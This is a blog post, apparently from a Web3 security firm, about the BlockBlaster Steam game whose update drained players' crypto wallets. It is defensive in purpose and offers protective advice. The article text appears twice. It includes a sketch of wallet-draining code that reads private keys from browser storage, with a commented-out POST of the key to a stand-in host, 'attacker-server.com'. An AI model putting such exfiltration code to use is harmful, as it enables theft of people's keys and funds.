
Reth Mainnet Bug Explained: Ethereum State Root Mismatch Incident (Sept 2025)
Dive into the September 2025 Reth Ethereum client bug post-mortem. We explain the state root mismatch caused by corrupted tries, its impact, and how it was fixed.

When IDE Extensions Attack: The Cursor Story
Learn how the Cursor security incident exposed a new threat to Web3 developers. This guide explains supply chain attacks on IDEs and provides actionable steps to protect your private keys and digital assets.
From blockchain fundamentals to advanced DevOps and Web3 systems, we break down complex tech into practical, developer-friendly insights.



Reth Mainnet Bug Explained: Ethereum State Root Mismatch Incident (Sept 2025)
Dive into the September 2025 Reth Ethereum client bug post-mortem. We explain the state root mismatch caused by corrupted tries, its impact, and how it was fixed.

When IDE Extensions Attack: The Cursor Story
Learn how the Cursor security incident exposed a new threat to Web3 developers. This guide explains supply chain attacks on IDEs and provides actionable steps to protect your private keys and digital assets.
Share Dialog
Share Dialog
From blockchain fundamentals to advanced DevOps and Web3 systems, we break down complex tech into practical, developer-friendly insights.
I’ve always loved the idea that games are a kind of safe haven - a digital escape where your real-world problems take a back seat. And in the Web3 space, gaming has evolved into something even more fascinating: a place where digital ownership is real, value flows between players, and virtual economies can become lifelines.
But what happens when the very system that promises freedom, transparency, and empowerment becomes the vehicle for financial devastation?
This is a story about a game that wasn’t what it seemed. About a trusted platform that unknowingly served as a delivery system for malware. And about a streamer who learned — in the worst possible way — how fragile our digital security really is.
This is the story of BlockBlaster, the Steam game that stole over $150,000 in crypto — live, in front of a global audience.
It started like any other stream. Rostaland, a mid-tier but beloved gaming streamer, had been battling cancer while continuing to entertain a loyal audience. Their community had rallied around them in the months prior, helping raise funds for treatment — a heartwarming example of internet kindness.
On that particular day in early September 2025, Rostaland was excited to try out a new title: BlockBlaster, a retro-style shooter with Web3 integration. It was getting buzz in gaming forums, and it was available directly on Steam, arguably the most trusted PC gaming platform on the planet.
Within seconds of launching the game by a user, everything changed. Their crypto wallet — the one holding over $31,000 in community-donated funds — was drained. And it happened live on stream.
What looked like a routine game launch turned into a financial ambush, broadcast to thousands of stunned viewers in real time.
Most people associate crypto hacks with shady websites or phishing links. You know the kind: too-good-to-be-true airdrops, fake MetaMask popups, or impersonated Discord admins. But this wasn’t that.
This came from Steam.
BlockBlaster had been published through Steam by a developer going by the name Genesis Interactive. Their profile was verified. The game had been live for weeks. There were no red flags. And that’s exactly what made the attack so effective.
In late August 2025, Genesis Interactive pushed an update to the game — nothing out of the ordinary, or so it seemed. But buried inside the update was a crypto drainer — a small but powerful piece of malicious code designed to silently scan the user’s system, locate crypto wallet data, and transmit it to a remote server controlled by the attacker.
It didn’t matter if you had antivirus software. It didn’t matter that you downloaded the game from a “safe” storefront. The moment you launched BlockBlaster, it was already too late.
There’s a phrase in cybersecurity: “Humans are the weakest link.” But I’d argue that in this case, it wasn’t just human error — it was systemic trust that got exploited.
Think about it. Most of us have been trained to trust platforms. We trust the App Store not to serve us malware. We trust Chrome Extensions that are marked “Verified.” And in gaming, we trust that something downloaded from Steam — especially from a verified publisher — isn’t going to rob us blind.
BlockBlaster flipped that assumption on its head.
It used trust as the delivery vehicle. It didn’t trick you with a sketchy download link. It didn’t try to get you to sign a transaction. It just slipped through a legitimate update pipeline and waited patiently for players to launch it.
That’s what makes this story so important. Because if it can happen through Steam, it can happen anywhere.

A seemingly innocent game update steals sensitive data, leading to a financial loss.
If you’re not familiar with how crypto wallets work under the hood, here's the gist.
Browser-based wallets like MetaMask or Phantom store encrypted wallet data locally. While this data is generally protected, under certain conditions — such as improper permissions or unsafe environments — it can be accessed by malicious scripts, especially if the user has left the wallet logged in.
In the case of BlockBlaster, the malware was built to target the local storage areas in browsers where wallet extensions may temporarily store sensitive data. It searched for keys, seed phrases, and other authentication data, and if it found anything usable, it sent it off silently to an attacker-controlled server.
Here’s a simplified version of what that logic might look like:
Educational purposes only — do not run this code.
// hypothetical_malicious_script.js
function exfiltrateWalletData() {
let privateKey = null;
try {
const knownExtensions = ['phantom', 'metamask', 'coinbase'];
for (const ext of knownExtensions) {
const data = localStorage.getItem(`walletData_${ext}`);
if (data) {
const walletInfo = JSON.parse(data);
if (walletInfo && walletInfo.privateKey) {
privateKey = walletInfo.privateKey;
break;
}
}
}
if (privateKey) {
console.log("ALERT: Malicious script found and exfiltrated private key!");
// fetch('<https://attacker-server.com/steal>', {
// method: 'POST',
// body: JSON.stringify({ key: privateKey })
// });
}
} catch (e) {
console.error("Script failed to execute:", e);
}
}
The real version of this code would have been heavily obfuscated, making it harder to detect through casual inspection.
To understand the difference, here’s how legitimate crypto applications interact with wallets. In short: they don’t touch your private keys at all.
// secure_wallet_interaction.js
async function requestSecureTransaction(amount, recipientAddress) {
if (window.ethereum) {
const provider = window.ethereum;
try {
const accounts = await provider.request({ method: 'eth_requestAccounts' });
const currentAccount = accounts[0];
const transactionParameters = {
to: recipientAddress,
from: currentAccount,
value: '0x' + (amount * Math.pow(10, 18)).toString(16),
};
const txHash = await provider.request({
method: 'eth_sendTransaction',
params: [transactionParameters],
});
console.log("Transaction successfully sent with hash:", txHash);
} catch (error) {
console.error("User rejected transaction or an error occurred:", error);
}
} else {
console.error("Ethereum wallet not found. Please install MetaMask or another provider.");
}
}
Notice that all sensitive operations — signing, broadcasting, and transaction authorization — are handled inside the wallet itself. At no point does your private key touch the application code.
The crypto world, to its credit, responded quickly.
Cybersecurity researchers began dissecting BlockBlaster’s code. Word spread fast on X (Twitter), Discord, Reddit, and YouTube. Multiple influencers amplified the warning, and a massive community effort formed to track affected wallets, block attacker addresses, and — most hearteningly — help victims.
In Rostaland’s case, the community didn’t just express sympathy. They raised enough funds to replace the stolen crypto — and then some.
But the damage was already done. Hundreds of users were hit. And more importantly, a warning had been sounded: games can now be attack vectors in Web3.
The Web3 world has seen its share of exploits. Flash loan attacks. Rug pulls. DNS hijacks. But BlockBlaster represented a new twist.
This wasn’t a bug in a smart contract. It wasn’t a social engineering scam. It was a verified software update pushed through a legitimate distribution platform.
And it targeted a new kind of user: gamers with crypto wallets. People who aren’t necessarily DeFi experts. People who just wanted to play a game.
That’s what makes this such a pivotal moment. The attack blurred the line between traditional software malware and crypto-native theft.
Let’s break down what this incident teaches us — not just as crypto users, but as digital citizens.
Even platforms with strong reputations — Steam, Chrome Web Store, Apple’s App Store — can be compromised. Trust is not a guarantee of security. Always do independent research.
Never keep all your assets in a hot wallet. Use a cold wallet (hardware wallet) for your savings, and a low-risk hot wallet for experimentation, gaming, and DeFi.
Consider setting up a separate browser profile (or even a whole browser) exclusively for Web3 use. Keep it lean. No extra extensions. No saved credentials. Reduce the surface area for attack.
If your wallet extension keeps you signed in indefinitely, you’re exposing yourself. Set it to auto-lock or manually sign in every session.
Follow white-hat hackers, security analysts, and crypto risk auditors. Many vulnerabilities are disclosed early on Twitter, GitHub, or Substack before they make it into official news.
BlockBlaster wasn’t an anomaly. Earlier in 2025, at least three other titles — Sniper Phantoms Resolution, Akeia, and Pirate Fi — were found to be hiding info-stealer malware. Most didn’t make headlines because their damage was smaller. But the pattern is clear.
Game-based attacks are on the rise. They’re harder to detect, easier to distribute, and target users who may not even know what to look for.
Crypto gaming is growing fast. And with that growth comes exposure — not just to economic volatility, but to new forms of cybercrime.
As someone who grew up trusting game platforms, this case hit differently. It forced me to reevaluate where I place trust and how I manage digital identity and assets.
We’re entering a new era. One where your Web3 wallet is just as critical as your email account or password manager. Maybe more so. And that means the way we play, download, and interact with games has to change.
No longer is it enough to be cautious on shady sites. We have to be cautious everywhere.
If you’re part of this space—whether you're a gamer, developer, investor, or creator — now is the time to harden your habits. Because in Web3, the difference between security and catastrophe often comes down to a single click.
Stay safe out there.
Let’s build something incredible together.
Email us at: hello@ancilar.com
Explore more: www.ancilar.com
I’ve always loved the idea that games are a kind of safe haven - a digital escape where your real-world problems take a back seat. And in the Web3 space, gaming has evolved into something even more fascinating: a place where digital ownership is real, value flows between players, and virtual economies can become lifelines.
But what happens when the very system that promises freedom, transparency, and empowerment becomes the vehicle for financial devastation?
This is a story about a game that wasn’t what it seemed. About a trusted platform that unknowingly served as a delivery system for malware. And about a streamer who learned — in the worst possible way — how fragile our digital security really is.
This is the story of BlockBlaster, the Steam game that stole over $150,000 in crypto — live, in front of a global audience.
It started like any other stream. Rostaland, a mid-tier but beloved gaming streamer, had been battling cancer while continuing to entertain a loyal audience. Their community had rallied around them in the months prior, helping raise funds for treatment — a heartwarming example of internet kindness.
On that particular day in early September 2025, Rostaland was excited to try out a new title: BlockBlaster, a retro-style shooter with Web3 integration. It was getting buzz in gaming forums, and it was available directly on Steam, arguably the most trusted PC gaming platform on the planet.
Within seconds of launching the game by a user, everything changed. Their crypto wallet — the one holding over $31,000 in community-donated funds — was drained. And it happened live on stream.
What looked like a routine game launch turned into a financial ambush, broadcast to thousands of stunned viewers in real time.
Most people associate crypto hacks with shady websites or phishing links. You know the kind: too-good-to-be-true airdrops, fake MetaMask popups, or impersonated Discord admins. But this wasn’t that.
This came from Steam.
BlockBlaster had been published through Steam by a developer going by the name Genesis Interactive. Their profile was verified. The game had been live for weeks. There were no red flags. And that’s exactly what made the attack so effective.
In late August 2025, Genesis Interactive pushed an update to the game — nothing out of the ordinary, or so it seemed. But buried inside the update was a crypto drainer — a small but powerful piece of malicious code designed to silently scan the user’s system, locate crypto wallet data, and transmit it to a remote server controlled by the attacker.
It didn’t matter if you had antivirus software. It didn’t matter that you downloaded the game from a “safe” storefront. The moment you launched BlockBlaster, it was already too late.
There’s a phrase in cybersecurity: “Humans are the weakest link.” But I’d argue that in this case, it wasn’t just human error — it was systemic trust that got exploited.
Think about it. Most of us have been trained to trust platforms. We trust the App Store not to serve us malware. We trust Chrome Extensions that are marked “Verified.” And in gaming, we trust that something downloaded from Steam — especially from a verified publisher — isn’t going to rob us blind.
BlockBlaster flipped that assumption on its head.
It used trust as the delivery vehicle. It didn’t trick you with a sketchy download link. It didn’t try to get you to sign a transaction. It just slipped through a legitimate update pipeline and waited patiently for players to launch it.
That’s what makes this story so important. Because if it can happen through Steam, it can happen anywhere.

A seemingly innocent game update steals sensitive data, leading to a financial loss.
If you’re not familiar with how crypto wallets work under the hood, here's the gist.
Browser-based wallets like MetaMask or Phantom store encrypted wallet data locally. While this data is generally protected, under certain conditions — such as improper permissions or unsafe environments — it can be accessed by malicious scripts, especially if the user has left the wallet logged in.
In the case of BlockBlaster, the malware was built to target the local storage areas in browsers where wallet extensions may temporarily store sensitive data. It searched for keys, seed phrases, and other authentication data, and if it found anything usable, it sent it off silently to an attacker-controlled server.
Here’s a simplified version of what that logic might look like:
Educational purposes only — do not run this code.
// hypothetical_malicious_script.js
function exfiltrateWalletData() {
let privateKey = null;
try {
const knownExtensions = ['phantom', 'metamask', 'coinbase'];
for (const ext of knownExtensions) {
const data = localStorage.getItem(`walletData_${ext}`);
if (data) {
const walletInfo = JSON.parse(data);
if (walletInfo && walletInfo.privateKey) {
privateKey = walletInfo.privateKey;
break;
}
}
}
if (privateKey) {
console.log("ALERT: Malicious script found and exfiltrated private key!");
// fetch('<https://attacker-server.com/steal>', {
// method: 'POST',
// body: JSON.stringify({ key: privateKey })
// });
}
} catch (e) {
console.error("Script failed to execute:", e);
}
}
The real version of this code would have been heavily obfuscated, making it harder to detect through casual inspection.
To understand the difference, here’s how legitimate crypto applications interact with wallets. In short: they don’t touch your private keys at all.
// secure_wallet_interaction.js
async function requestSecureTransaction(amount, recipientAddress) {
if (window.ethereum) {
const provider = window.ethereum;
try {
const accounts = await provider.request({ method: 'eth_requestAccounts' });
const currentAccount = accounts[0];
const transactionParameters = {
to: recipientAddress,
from: currentAccount,
value: '0x' + (amount * Math.pow(10, 18)).toString(16),
};
const txHash = await provider.request({
method: 'eth_sendTransaction',
params: [transactionParameters],
});
console.log("Transaction successfully sent with hash:", txHash);
} catch (error) {
console.error("User rejected transaction or an error occurred:", error);
}
} else {
console.error("Ethereum wallet not found. Please install MetaMask or another provider.");
}
}
Notice that all sensitive operations — signing, broadcasting, and transaction authorization — are handled inside the wallet itself. At no point does your private key touch the application code.
The crypto world, to its credit, responded quickly.
Cybersecurity researchers began dissecting BlockBlaster’s code. Word spread fast on X (Twitter), Discord, Reddit, and YouTube. Multiple influencers amplified the warning, and a massive community effort formed to track affected wallets, block attacker addresses, and — most hearteningly — help victims.
In Rostaland’s case, the community didn’t just express sympathy. They raised enough funds to replace the stolen crypto — and then some.
But the damage was already done. Hundreds of users were hit. And more importantly, a warning had been sounded: games can now be attack vectors in Web3.
The Web3 world has seen its share of exploits. Flash loan attacks. Rug pulls. DNS hijacks. But BlockBlaster represented a new twist.
This wasn’t a bug in a smart contract. It wasn’t a social engineering scam. It was a verified software update pushed through a legitimate distribution platform.
And it targeted a new kind of user: gamers with crypto wallets. People who aren’t necessarily DeFi experts. People who just wanted to play a game.
That’s what makes this such a pivotal moment. The attack blurred the line between traditional software malware and crypto-native theft.
Let’s break down what this incident teaches us — not just as crypto users, but as digital citizens.
Even platforms with strong reputations — Steam, Chrome Web Store, Apple’s App Store — can be compromised. Trust is not a guarantee of security. Always do independent research.
Never keep all your assets in a hot wallet. Use a cold wallet (hardware wallet) for your savings, and a low-risk hot wallet for experimentation, gaming, and DeFi.
Consider setting up a separate browser profile (or even a whole browser) exclusively for Web3 use. Keep it lean. No extra extensions. No saved credentials. Reduce the surface area for attack.
If your wallet extension keeps you signed in indefinitely, you’re exposing yourself. Set it to auto-lock or manually sign in every session.
Follow white-hat hackers, security analysts, and crypto risk auditors. Many vulnerabilities are disclosed early on Twitter, GitHub, or Substack before they make it into official news.
BlockBlaster wasn’t an anomaly. Earlier in 2025, at least three other titles — Sniper Phantoms Resolution, Akeia, and Pirate Fi — were found to be hiding info-stealer malware. Most didn’t make headlines because their damage was smaller. But the pattern is clear.
Game-based attacks are on the rise. They’re harder to detect, easier to distribute, and target users who may not even know what to look for.
Crypto gaming is growing fast. And with that growth comes exposure — not just to economic volatility, but to new forms of cybercrime.
As someone who grew up trusting game platforms, this case hit differently. It forced me to reevaluate where I place trust and how I manage digital identity and assets.
We’re entering a new era. One where your Web3 wallet is just as critical as your email account or password manager. Maybe more so. And that means the way we play, download, and interact with games has to change.
No longer is it enough to be cautious on shady sites. We have to be cautious everywhere.
If you’re part of this space—whether you're a gamer, developer, investor, or creator — now is the time to harden your habits. Because in Web3, the difference between security and catastrophe often comes down to a single click.
Stay safe out there.
Let’s build something incredible together.
Email us at: hello@ancilar.com
Explore more: www.ancilar.com

Subscribe to Ancilar

Subscribe to Ancilar
<100 subscribers
<100 subscribers
No activity yet